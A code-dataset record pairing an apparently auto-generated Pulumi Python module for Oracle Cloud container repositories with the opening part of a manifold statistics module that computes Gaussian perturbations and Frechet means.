class ContainerRepositoryArgs:
def __init__(__self__, *,
compartment_id: pulumi.Input[str],
display_name: pulumi.Input[str],
is_immutable: Optional[pulumi.Input[bool]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
readme: Optional[pulumi.Input['ContainerRepositoryReadmeArgs']] = None):
"""
The set of arguments for constructing a ContainerRepository resource.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which to create the resource.
:param pulumi.Input[str] display_name: The container repository name.
:param pulumi.Input[bool] is_immutable: (Updatable) Whether the repository is immutable. Images cannot be overwritten in an immutable repository.
:param pulumi.Input[bool] is_public: (Updatable) Whether the repository is public. A public repository allows unauthenticated access.
:param pulumi.Input['ContainerRepositoryReadmeArgs'] readme: (Updatable) Container repository readme.
"""
pulumi.set(__self__, "compartment_id", compartment_id)
pulumi.set(__self__, "display_name", display_name)
if is_immutable is not None:
pulumi.set(__self__, "is_immutable", is_immutable)
if is_public is not None:
pulumi.set(__self__, "is_public", is_public)
if readme is not None:
pulumi.set(__self__, "readme", readme)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Input[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which to create the resource.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: pulumi.Input[str]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Input[str]:
"""
The container repository name.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: pulumi.Input[str]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="isImmutable")
def is_immutable(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Whether the repository is immutable. Images cannot be overwritten in an immutable repository.
"""
return pulumi.get(self, "is_immutable")
@is_immutable.setter
def is_immutable(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_immutable", value)
@property
@pulumi.getter(name="isPublic")
def is_public(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Whether the repository is public. A public repository allows unauthenticated access.
"""
return pulumi.get(self, "is_public")
@is_public.setter
def is_public(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_public", value)
@property
@pulumi.getter
def readme(self) -> Optional[pulumi.Input['ContainerRepositoryReadmeArgs']]:
"""
(Updatable) Container repository readme.
"""
return pulumi.get(self, "readme")
@readme.setter
def readme(self, value: Optional[pulumi.Input['ContainerRepositoryReadmeArgs']]):
pulumi.set(self, "readme", value)
@pulumi.input_type
class _ContainerRepositoryState:
def __init__(__self__, *,
billable_size_in_gbs: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
created_by: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
image_count: Optional[pulumi.Input[int]] = None,
is_immutable: Optional[pulumi.Input[bool]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
layer_count: Optional[pulumi.Input[int]] = None,
layers_size_in_bytes: Optional[pulumi.Input[str]] = None,
readme: Optional[pulumi.Input['ContainerRepositoryReadmeArgs']] = None,
state: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_last_pushed: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ContainerRepository resources.
:param pulumi.Input[str] billable_size_in_gbs: Total storage size in GBs that will be charged.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which to create the resource.
:param pulumi.Input[str] created_by: The id of the user or principal that created the resource.
:param pulumi.Input[str] display_name: The container repository name.
:param pulumi.Input[int] image_count: Total number of images.
:param pulumi.Input[bool] is_immutable: (Updatable) Whether the repository is immutable. Images cannot be overwritten in an immutable repository.
:param pulumi.Input[bool] is_public: (Updatable) Whether the repository is public. A public repository allows unauthenticated access.
:param pulumi.Input[int] layer_count: Total number of layers.
:param pulumi.Input[str] layers_size_in_bytes: Total storage in bytes consumed by layers.
:param pulumi.Input['ContainerRepositoryReadmeArgs'] readme: (Updatable) Container repository readme.
:param pulumi.Input[str] state: The current state of the container repository.
:param pulumi.Input[str] time_created: An RFC 3339 timestamp indicating when the repository was created.
:param pulumi.Input[str] time_last_pushed: An RFC 3339 timestamp indicating when an image was last pushed to the repository.
"""
if billable_size_in_gbs is not None:
pulumi.set(__self__, "billable_size_in_gbs", billable_size_in_gbs)
if compartment_id is not None:
pulumi.set(__self__, "compartment_id", compartment_id)
if created_by is not None:
pulumi.set(__self__, "created_by", created_by)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if image_count is not None:
pulumi.set(__self__, "image_count", image_count)
if is_immutable is not None:
pulumi.set(__self__, "is_immutable", is_immutable)
if is_public is not None:
pulumi.set(__self__, "is_public", is_public)
if layer_count is not None:
pulumi.set(__self__, "layer_count", layer_count)
if layers_size_in_bytes is not None:
pulumi.set(__self__, "layers_size_in_bytes", layers_size_in_bytes)
if readme is not None:
pulumi.set(__self__, "readme", readme)
if state is not None:
pulumi.set(__self__, "state", state)
if time_created is not None:
pulumi.set(__self__, "time_created", time_created)
if time_last_pushed is not None:
pulumi.set(__self__, "time_last_pushed", time_last_pushed)
@property
@pulumi.getter(name="billableSizeInGbs")
def billable_size_in_gbs(self) -> Optional[pulumi.Input[str]]:
"""
Total storage size in GBs that will be charged.
"""
return pulumi.get(self, "billable_size_in_gbs")
@billable_size_in_gbs.setter
def billable_size_in_gbs(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "billable_size_in_gbs", value)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which to create the resource.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="createdBy")
def created_by(self) -> Optional[pulumi.Input[str]]:
"""
The id of the user or principal that created the resource.
"""
return pulumi.get(self, "created_by")
@created_by.setter
def created_by(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "created_by", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
The container repository name.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="imageCount")
def image_count(self) -> Optional[pulumi.Input[int]]:
"""
Total number of images.
"""
return pulumi.get(self, "image_count")
@image_count.setter
def image_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "image_count", value)
@property
@pulumi.getter(name="isImmutable")
def is_immutable(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Whether the repository is immutable. Images cannot be overwritten in an immutable repository.
"""
return pulumi.get(self, "is_immutable")
@is_immutable.setter
def is_immutable(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_immutable", value)
@property
@pulumi.getter(name="isPublic")
def is_public(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Whether the repository is public. A public repository allows unauthenticated access.
"""
return pulumi.get(self, "is_public")
@is_public.setter
def is_public(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_public", value)
@property
@pulumi.getter(name="layerCount")
def layer_count(self) -> Optional[pulumi.Input[int]]:
"""
Total number of layers.
"""
return pulumi.get(self, "layer_count")
@layer_count.setter
def layer_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "layer_count", value)
@property
@pulumi.getter(name="layersSizeInBytes")
def layers_size_in_bytes(self) -> Optional[pulumi.Input[str]]:
"""
Total storage in bytes consumed by layers.
"""
return pulumi.get(self, "layers_size_in_bytes")
@layers_size_in_bytes.setter
def layers_size_in_bytes(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "layers_size_in_bytes", value)
@property
@pulumi.getter
def readme(self) -> Optional[pulumi.Input['ContainerRepositoryReadmeArgs']]:
"""
(Updatable) Container repository readme.
"""
return pulumi.get(self, "readme")
@readme.setter
def readme(self, value: Optional[pulumi.Input['ContainerRepositoryReadmeArgs']]):
pulumi.set(self, "readme", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
The current state of the container repository.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> Optional[pulumi.Input[str]]:
"""
An RFC 3339 timestamp indicating when the repository was created.
"""
return pulumi.get(self, "time_created")
@time_created.setter
def time_created(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_created", value)
@property
@pulumi.getter(name="timeLastPushed")
def time_last_pushed(self) -> Optional[pulumi.Input[str]]:
"""
An RFC 3339 timestamp indicating when an image was last pushed to the repository.
"""
return pulumi.get(self, "time_last_pushed")
@time_last_pushed.setter
def time_last_pushed(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_last_pushed", value)
class ContainerRepository(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
is_immutable: Optional[pulumi.Input[bool]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
readme: Optional[pulumi.Input[pulumi.InputType['ContainerRepositoryReadmeArgs']]] = None,
__props__=None):
"""
This resource provides the Container Repository resource in Oracle Cloud Infrastructure Artifacts service.
Create a new empty container repository. Avoid entering confidential information.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_container_repository = oci.artifacts.ContainerRepository("testContainerRepository",
compartment_id=var["compartment_id"],
display_name=var["container_repository_display_name"],
is_immutable=var["container_repository_is_immutable"],
is_public=var["container_repository_is_public"],
readme=oci.artifacts.ContainerRepositoryReadmeArgs(
content=var["container_repository_readme_content"],
format=var["container_repository_readme_format"],
))
```
## Import
ContainerRepositories can be imported using the `id`, e.g.
```sh
$ pulumi import oci:artifacts/containerRepository:ContainerRepository test_container_repository "container/repositories/{repositoryId}"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which to create the resource.
:param pulumi.Input[str] display_name: The container repository name.
:param pulumi.Input[bool] is_immutable: (Updatable) Whether the repository is immutable. Images cannot be overwritten in an immutable repository.
:param pulumi.Input[bool] is_public: (Updatable) Whether the repository is public. A public repository allows unauthenticated access.
:param pulumi.Input[pulumi.InputType['ContainerRepositoryReadmeArgs']] readme: (Updatable) Container repository readme.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ContainerRepositoryArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource provides the Container Repository resource in Oracle Cloud Infrastructure Artifacts service.
Create a new empty container repository. Avoid entering confidential information.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_container_repository = oci.artifacts.ContainerRepository("testContainerRepository",
compartment_id=var["compartment_id"],
display_name=var["container_repository_display_name"],
is_immutable=var["container_repository_is_immutable"],
is_public=var["container_repository_is_public"],
readme=oci.artifacts.ContainerRepositoryReadmeArgs(
content=var["container_repository_readme_content"],
format=var["container_repository_readme_format"],
))
```
## Import
ContainerRepositories can be imported using the `id`, e.g.
```sh
$ pulumi import oci:artifacts/containerRepository:ContainerRepository test_container_repository "container/repositories/{repositoryId}"
```
:param str resource_name: The name of the resource.
:param ContainerRepositoryArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ContainerRepositoryArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
is_immutable: Optional[pulumi.Input[bool]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
readme: Optional[pulumi.Input[pulumi.InputType['ContainerRepositoryReadmeArgs']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ContainerRepositoryArgs.__new__(ContainerRepositoryArgs)
if compartment_id is None and not opts.urn:
raise TypeError("Missing required property 'compartment_id'")
__props__.__dict__["compartment_id"] = compartment_id
if display_name is None and not opts.urn:
raise TypeError("Missing required property 'display_name'")
__props__.__dict__["display_name"] = display_name
__props__.__dict__["is_immutable"] = is_immutable
__props__.__dict__["is_public"] = is_public
__props__.__dict__["readme"] = readme
__props__.__dict__["billable_size_in_gbs"] = None
__props__.__dict__["created_by"] = None
__props__.__dict__["image_count"] = None
__props__.__dict__["layer_count"] = None
__props__.__dict__["layers_size_in_bytes"] = None
__props__.__dict__["state"] = None
__props__.__dict__["time_created"] = None
__props__.__dict__["time_last_pushed"] = None
super(ContainerRepository, __self__).__init__(
'oci:artifacts/containerRepository:ContainerRepository',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
billable_size_in_gbs: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
created_by: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
image_count: Optional[pulumi.Input[int]] = None,
is_immutable: Optional[pulumi.Input[bool]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
layer_count: Optional[pulumi.Input[int]] = None,
layers_size_in_bytes: Optional[pulumi.Input[str]] = None,
readme: Optional[pulumi.Input[pulumi.InputType['ContainerRepositoryReadmeArgs']]] = None,
state: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_last_pushed: Optional[pulumi.Input[str]] = None) -> 'ContainerRepository':
"""
Get an existing ContainerRepository resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] billable_size_in_gbs: Total storage size in GBs that will be charged.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which to create the resource.
:param pulumi.Input[str] created_by: The id of the user or principal that created the resource.
:param pulumi.Input[str] display_name: The container repository name.
:param pulumi.Input[int] image_count: Total number of images.
:param pulumi.Input[bool] is_immutable: (Updatable) Whether the repository is immutable. Images cannot be overwritten in an immutable repository.
:param pulumi.Input[bool] is_public: (Updatable) Whether the repository is public. A public repository allows unauthenticated access.
:param pulumi.Input[int] layer_count: Total number of layers.
:param pulumi.Input[str] layers_size_in_bytes: Total storage in bytes consumed by layers.
:param pulumi.Input[pulumi.InputType['ContainerRepositoryReadmeArgs']] readme: (Updatable) Container repository readme.
:param pulumi.Input[str] state: The current state of the container repository.
:param pulumi.Input[str] time_created: An RFC 3339 timestamp indicating when the repository was created.
:param pulumi.Input[str] time_last_pushed: An RFC 3339 timestamp indicating when an image was last pushed to the repository.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ContainerRepositoryState.__new__(_ContainerRepositoryState)
__props__.__dict__["billable_size_in_gbs"] = billable_size_in_gbs
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["created_by"] = created_by
__props__.__dict__["display_name"] = display_name
__props__.__dict__["image_count"] = image_count
__props__.__dict__["is_immutable"] = is_immutable
__props__.__dict__["is_public"] = is_public
__props__.__dict__["layer_count"] = layer_count
__props__.__dict__["layers_size_in_bytes"] = layers_size_in_bytes
__props__.__dict__["readme"] = readme
__props__.__dict__["state"] = state
__props__.__dict__["time_created"] = time_created
__props__.__dict__["time_last_pushed"] = time_last_pushed
return ContainerRepository(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="billableSizeInGbs")
def billable_size_in_gbs(self) -> pulumi.Output[str]:
"""
Total storage size in GBs that will be charged.
"""
return pulumi.get(self, "billable_size_in_gbs")
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Output[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which to create the resource.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter(name="createdBy")
def created_by(self) -> pulumi.Output[str]:
"""
The id of the user or principal that created the resource.
"""
return pulumi.get(self, "created_by")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
The container repository name.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="imageCount")
def image_count(self) -> pulumi.Output[int]:
"""
Total number of images.
"""
return pulumi.get(self, "image_count")
@property
@pulumi.getter(name="isImmutable")
def is_immutable(self) -> pulumi.Output[bool]:
"""
(Updatable) Whether the repository is immutable. Images cannot be overwritten in an immutable repository.
"""
return pulumi.get(self, "is_immutable")
@property
@pulumi.getter(name="isPublic")
def is_public(self) -> pulumi.Output[bool]:
"""
(Updatable) Whether the repository is public. A public repository allows unauthenticated access.
"""
return pulumi.get(self, "is_public")
@property
@pulumi.getter(name="layerCount")
def layer_count(self) -> pulumi.Output[int]:
"""
Total number of layers.
"""
return pulumi.get(self, "layer_count")
@property
@pulumi.getter(name="layersSizeInBytes")
def layers_size_in_bytes(self) -> pulumi.Output[str]:
"""
Total storage in bytes consumed by layers.
"""
return pulumi.get(self, "layers_size_in_bytes")
@property
@pulumi.getter
def readme(self) -> pulumi.Output['outputs.ContainerRepositoryReadme']:
"""
(Updatable) Container repository readme.
"""
return pulumi.get(self, "readme")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
The current state of the container repository.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
An RFC 3339 timestamp indicating when the repository was created.
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="timeLastPushed")
def time_last_pushed(self) -> pulumi.Output[str]:
"""
An RFC 3339 timestamp indicating when an image was last pushed to the repository.
"""
return pulumi.get(self, "time_last_pushed")
| 43.972492
| 200
| 0.661454
| 3,108
| 27,175
| 5.524131
| 0.07175
| 0.074961
| 0.078572
| 0.04613
| 0.863009
| 0.838779
| 0.806046
| 0.78135
| 0.764692
| 0.706681
| 0
| 0.001589
| 0.235842
| 27,175
| 617
| 201
| 44.04376
| 0.825195
| 0.332879
| 0
| 0.596491
| 1
| 0
| 0.123909
| 0.022266
| 0
| 0
| 0
| 0
| 0
| 1
| 0.163743
| false
| 0.002924
| 0.020468
| 0
| 0.28655
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4ec4918af1234bf1c8c9ccca7e90ee1a84b3a8e0
| 179,336
|
py
|
Python
|
StatsModel.py
|
sh4174/LonWGP
|
24d1876cf6bedca64e63041d28e2a54d9475997f
|
[
"MIT"
] | null | null | null |
StatsModel.py
|
sh4174/LonWGP
|
24d1876cf6bedca64e63041d28e2a54d9475997f
|
[
"MIT"
] | null | null | null |
StatsModel.py
|
sh4174/LonWGP
|
24d1876cf6bedca64e63041d28e2a54d9475997f
|
[
"MIT"
] | null | null | null |
# MRep Manifold
import manifolds
import numpy as np
import pylab
from random import shuffle
import itertools
# Stats Model
import statsmodels.api as sm
import matplotlib.pyplot as plt
#############################################################
########## Generalized Gaussian Noise Generation ##########
#############################################################
def GaussianNoisePerturbation( mu_0, sigma ):
if mu_0.Type == "Sphere":
return GaussianNoisePerturbation_Sphere( mu_0, sigma )
# elif dataList[ 0 ].Type == "PositiveReal":
# return GaussianNoisePerturbation_PosReal( mu_0, sigma )
# elif dataList[ 0 ].Type == "Euclidean":
# return GaussianNoisePerturbation_Euclidean( mu_0, sigma )
# elif dataList[ 0 ].Type == "CMRep":
# return GaussianNoisePerturbation_CMRep( mu_0, sigma )
# elif dataList[ 0 ].Type == "CMRep_Abstract":
# return GaussianNoisePerturbation_CMRep_Abstract( mu_0, sigma )
# elif dataList[ 0 ].Type == "MRep":
# return FrechetMean_MRep( dataList, maxIter, tol )
else:
print( "Manifold type is not known" )
return -1
def GaussianNoisePerturbation_Sphere( mu_0, sigma ):
nDimManifold = mu_0.nDim
# Generate a random Gaussians with polar Box-Muller Method
rand_pt = np.zeros( nDimManifold ).tolist()
for i in range( nDimManifold ):
r2 = 0
x = 0
y = 0
while( r2 > 1.0 or r2 == 0 ):
x = ( 2.0 * np.random.rand() - 1.0 )
y = ( 2.0 * np.random.rand() - 1.0 )
r2 = x * x + y * y
gen_rand_no = sigma * y * np.sqrt( -2.0 * np.log( r2 ) / r2 )
rand_pt[ i ] = gen_rand_no
# print( rand_pt )
# Set Random Vector to Tangent Vector - ListToTangent
rand_tVec = manifolds.sphere_tVec( nDimManifold )
rand_tVec.SetTangentVector( rand_pt )
# Projected Tangent to Mean Point
rand_tVec_projected = mu_0.ProjectTangent( mu_0, rand_tVec )
# Perturbed point at time_pt
pt_perturbed = mu_0.ExponentialMap( rand_tVec_projected )
return pt_perturbed
######################################
########## Intrinsic Mean ##########
######################################
def FrechetMean( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
if dataList[ 0 ].Type == "Sphere":
return FrechetMean_Sphere( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "PositiveReal":
return FrechetMean_PosReal( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "Euclidean":
return FrechetMean_Euclidean( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "CMRep":
return FrechetMean_CMRep( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "CMRep_BNDRNormals":
return FrechetMean_CMRep_BNDRNormals( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "CMRep_Abstract":
return FrechetMean_CMRep_Abstract( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "CMRep_Abstract_Normal":
return FrechetMean_CMRep_Abstract_Normal( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "Kendall2D":
return FrechetMean_Kendall2D( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "Scale_Kendall2D":
return FrechetMean_Scale_Kendall2D( dataList, maxIter, tol, stepsize )
# elif dataList[ 0 ].Type == "MRep":
# return FrechetMean_MRep( dataList, maxIter, tol )
else:
print( "Manifold type is not known" )
return -1
def FrechetMean_Sphere( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
mu = dataList[0]
nManDim = dataList[ 0 ].nDim
nData = len( dataList )
for i in range( maxIter ):
dMu = manifolds.sphere_tVec( nManDim )
for j in range( nData ):
Log_mu_to_y_j = mu.LogMap( dataList[ j ] )
for d in range( nManDim ):
dMu.tVector[ d ] += stepsize * ( ( 1.0 / nData ) * Log_mu_to_y_j.tVector[ d ] )
Mu_i = mu.ExponentialMap( dMu )
mu = Mu_i
return mu
def FrechetMean_Kendall2D( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
mu = dataList[0]
nManDim = dataList[ 0 ].nPt
nData = len( dataList )
for i in range( maxIter ):
dMu = manifolds.kendall2D_tVec( nManDim )
for j in range( nData ):
Log_mu_to_y_j = mu.LogMap( dataList[ j ] )
for d in range( nManDim ):
for k in range( 2 ):
dMu.tVector[ k ][ d ] += stepsize * ( ( 1.0 / nData ) * Log_mu_to_y_j.tVector[ k ][ d ] )
Mu_i = mu.ExponentialMap( dMu )
mu = Mu_i
return mu
def FrechetMean_PosReal( dataList, maxIter = 500, tol = 0.001, stepsize=0.01):
mu = dataList[0]
nManDim = dataList[ 0 ].nDim
nData = len( dataList )
for i in range( maxIter ):
dMu = manifolds.pos_real_tVec( nManDim )
for j in range( nData ):
Log_mu_to_y_j = mu.LogMap( dataList[ j ] )
for d in range( nManDim ):
dMu.tVector[ d ] += stepsize * ( ( 1.0 / nData ) * Log_mu_to_y_j.tVector[ d ] )
Mu_i = mu.ExponentialMap( dMu )
mu = Mu_i
return mu
def FrechetMean_Euclidean( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
mu = dataList[0]
nManDim = dataList[ 0 ].nDim
nData = len( dataList )
for i in range( maxIter ):
dMu = manifolds.euclidean_tVec( nManDim )
for j in range( nData ):
Log_mu_to_y_j = mu.LogMap( dataList[ j ] )
for d in range( nManDim ):
dMu.tVector[ d ] += stepsize * ( ( 1.0 / nData ) * Log_mu_to_y_j.tVector[ d ] )
Mu_i = mu.ExponentialMap( dMu )
mu = Mu_i
return mu
def FrechetMean_CMRep( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nManDim = dataList[ 0 ].nDim
mu = manifolds.cmrep( nManDim )
nData = len( dataList )
for i in range( nManDim ):
data_list_pos_i = []
data_list_rad_i = []
for j in range( nData ):
data_list_pos_i.append( dataList[ j ].pt[ i ][ 0 ] )
data_list_rad_i.append( dataList[ j ].pt[ i ][ 1 ] )
mu_pos_i = FrechetMean( data_list_pos_i, maxIter, tol )
mu_rad_i = FrechetMean( data_list_rad_i, maxIter, tol )
mu.SetPosition( i, mu_pos_i.pt )
mu.SetRadius( i, mu_rad_i.pt )
mu.UpdateMeanRadius()
return mu
def FrechetMean_CMRep_BNDRNormals( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nManDim = dataList[ 0 ].nDim
mu = manifolds.cmrep_bndr_normals( nManDim )
nData = len( dataList )
for i in range( nManDim ):
data_list_pos_i = []
data_list_rad_i = []
data_list_spoke1_i = []
data_list_spoke2_i = []
for j in range( nData ):
data_list_pos_i.append( dataList[ j ].pt[ i ][ 0 ] )
data_list_rad_i.append( dataList[ j ].pt[ i ][ 1 ] )
data_list_spoke1_i.append( dataList[ j ].pt[ i ][ 2 ] )
data_list_spoke2_i.append( dataList[ j ].pt[ i ][ 3 ] )
mu_pos_i = FrechetMean( data_list_pos_i, maxIter, tol )
mu_rad_i = FrechetMean( data_list_rad_i, maxIter, tol )
mu_spoke1_i = FrechetMean( data_list_spoke1_i, maxIter, tol )
mu_spoke2_i = FrechetMean( data_list_spoke2_i, maxIter, tol )
mu.SetPosition( i, mu_pos_i.pt )
mu.SetRadius( i, mu_rad_i.pt )
mu.SetSpoke1( i, mu_spoke1_i.pt )
mu.SetSpoke2( i, mu_spoke2_i.pt )
mu.UpdateMeanRadius()
return mu
def FrechetMean_CMRep_Abstract( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nManDim = dataList[ 0 ].nDim
mu = manifolds.cmrep_abstract( nManDim )
nData = len( dataList )
mu_pt_arr = []
for i in range( 4 ):
data_list_i = []
for j in range( nData ):
data_list_i.append( dataList[ j ].pt[ i ] )
mu_i = FrechetMean( data_list_i, maxIter, tol, stepsize )
mu_pt_arr.append( mu_i )
mu.SetPoint( mu_pt_arr )
return mu
def FrechetMean_CMRep_Abstract_Normal( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nManDim = dataList[ 0 ].nDim
mu = manifolds.cmrep_abstract_normal( nManDim )
nData = len( dataList )
mu_pt_arr = []
for i in range( 4 ):
data_list_i = []
for j in range( nData ):
data_list_i.append( dataList[ j ].pt[ i ] )
mu_i = FrechetMean( data_list_i, maxIter, tol, stepsize )
mu_pt_arr.append( mu_i )
mu_bndr1 = []
mu_bndr2 = []
for i in range( nManDim ):
bndr1_list_i = []
bndr2_list_i = []
for j in range( nData ):
bndr1_list_i.append( dataList[ j ].pt[ 4 ][ i ] )
bndr2_list_i.append( dataList[ j ].pt[ 5 ][ i ] )
mu_bndr1_i = FrechetMean( bndr1_list_i, maxIter, tol, stepsize )
mu_bndr2_i = FrechetMean( bndr2_list_i, maxIter, tol, stepsize )
mu_bndr1.append( mu_bndr1_i )
mu_bndr2.append( mu_bndr2_i )
mu_pt_arr.append( mu_bndr1 )
mu_pt_arr.append( mu_bndr2 )
mu.SetPoint( mu_pt_arr )
return mu
def FrechetMean_Scale_Kendall2D( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nManDim = dataList[ 0 ].nPt
mu = manifolds.scale_kendall2D( nManDim )
nData = len( dataList )
mu_pt_arr = []
for i in range( 2 ):
data_list_i = []
for j in range( nData ):
data_list_i.append( dataList[ j ].pt[ i ] )
mu_i = FrechetMean( data_list_i, maxIter, tol, stepsize )
mu_pt_arr.append( mu_i )
mu.SetPoint( mu_pt_arr )
return mu
def WeightedFrechetMean( dataList, wList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
if dataList[ 0 ].Type == "Sphere":
return WeightedFrechetMean_Sphere( dataList, wList, maxIter, tol, stepsize )
# elif dataList[ 0 ].Type == "PositiveReal":
# return FrechetMean_PosReal( dataList, maxIter, tol, stepsize )
